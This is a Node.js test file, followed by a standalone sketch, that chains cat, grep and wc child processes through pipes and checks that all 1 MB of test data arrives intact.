Current file: node-v16.18.1/test/parallel/test-child-process-pipe-dataflow.js

'use strict';
const common = require('../common');
const assert = require('assert');
const path = require('path');
const fs = require('fs');
const spawn = require('child_process').spawn;
const tmpdir = require('../common/tmpdir');

let cat, grep, wc;

const KB = 1024;
const MB = KB * KB;


// Make sure process chaining allows desired data flow:
// check that `cat <file> | grep 'x' | wc -c` reports the full 1MB
// (plus one byte; see the final assertion).
// This helps to make sure no data is lost between pipes.

{
  tmpdir.refresh();
  const file = path.resolve(tmpdir.path, 'data.txt');
  const buf = Buffer.alloc(MB).fill('x');

  // Most OS commands that deal with data attach special meaning to newlines,
  // for example line buffering. So cut the buffer into lines at some points,
  // forcing the data flow to be split in the stream. Do not use os.EOL for \n,
  // as that is 2 characters on Windows and is sometimes converted to 1
  // character, which causes the test to fail.
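  // Overwrite one 'x' every KB bytes with '\n', producing KB lines of roughly
  // 1 KB each; the final line has no trailing newline.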
  for (let i = 1; i < KB; i++)
    buf.write('\n', i * KB);
  fs.writeFileSync(file, buf.toString());

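  // Chain the children by passing each child's stdout directly as the next
  // child's stdin (stdio[0]); the pipes are connected at the file-descriptor
  // level, so the payload never flows through this parent process.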
  cat = spawn('cat', [file]);
  grep = spawn('grep', ['x'], { stdio: [cat.stdout, 'pipe', 'pipe'] });
  wc = spawn('wc', ['-c'], { stdio: [grep.stdout, 'pipe', 'pipe'] });

  // Extra checks: We never try to start reading data ourselves.
  cat.stdout._handle.readStart = common.mustNotCall();
  grep.stdout._handle.readStart = common.mustNotCall();

  // Keep an array of error codes and assert on them during process exit. This
  // is because stdio can still be open when a child process exits, and we don't
  // want to lose information about what caused the error.
  const errors = [];
  process.on('exit', () => {
    assert.deepStrictEqual(errors, []);
  });

  [cat, grep, wc].forEach((child, index) => {
    const errorHandler = (thing, type) => {
      // Don't want to assert here, as we might miss error code info.
      console.error(`unexpected ${type} from child #${index}:\n${thing}`);
    };

    child.stderr.on('data', (d) => { errorHandler(d, 'data'); });
    child.on('error', (err) => { errorHandler(err, 'error'); });
    child.on('exit', common.mustCall((code) => {
      if (code !== 0) {
        errors.push(`child ${index} exited with code ${code}`);
      }
    }));
  });

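  // Collect wc's output (the final byte count); wc.stdout is the only stdout
  // the parent reads from.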
  let wcBuf = '';
  wc.stdout.on('data', common.mustCall((data) => {
    wcBuf += data;
  }));

  process.on('exit', () => {
    // Grep always adds one extra byte at the end.
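    // The input is MB bytes split into KB lines with no newline after the
    // last one; grep re-emits every line with a terminating '\n', so wc sees
    // (MB - (KB - 1)) content bytes + KB newlines = MB + 1 bytes.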
    assert.strictEqual(wcBuf.trim(), (MB + 1).toString());
  });
}
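
For reference, here is a minimal standalone sketch of the same chaining technique outside the Node.js test harness (no common or tmpdir helpers), assuming a POSIX-like system with cat, grep, and wc on the PATH. The file name standalone-pipe-chain.js and the temp-file path are illustrative only, not part of the test suite.

// standalone-pipe-chain.js (hypothetical name, for illustration only)
'use strict';
const assert = require('assert');
const fs = require('fs');
const os = require('os');
const path = require('path');
const { spawn } = require('child_process');

const MB = 1024 * 1024;
const file = path.join(os.tmpdir(), 'pipe-chain-data.txt');
fs.writeFileSync(file, Buffer.alloc(MB, 'x'));  // 1 MB of 'x', no newlines

// Wire cat -> grep -> wc at the fd level, exactly as the test above does.
const cat = spawn('cat', [file]);
const grep = spawn('grep', ['x'], { stdio: [cat.stdout, 'pipe', 'inherit'] });
const wc = spawn('wc', ['-c'], { stdio: [grep.stdout, 'pipe', 'inherit'] });

let out = '';
wc.stdout.on('data', (d) => { out += d; });
wc.on('close', () => {
  // grep terminates the single newline-less line it matched, hence MB + 1.
  assert.strictEqual(parseInt(out, 10), MB + 1);
  console.log(`pipeline delivered ${out.trim()} bytes`);
  fs.unlinkSync(file);
});

The design choice is the same as in the test: because each child's stdout stream is placed in the next child's stdio array, the kernel pipe is shared directly between the two children, and the parent only ever reads wc's final count.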
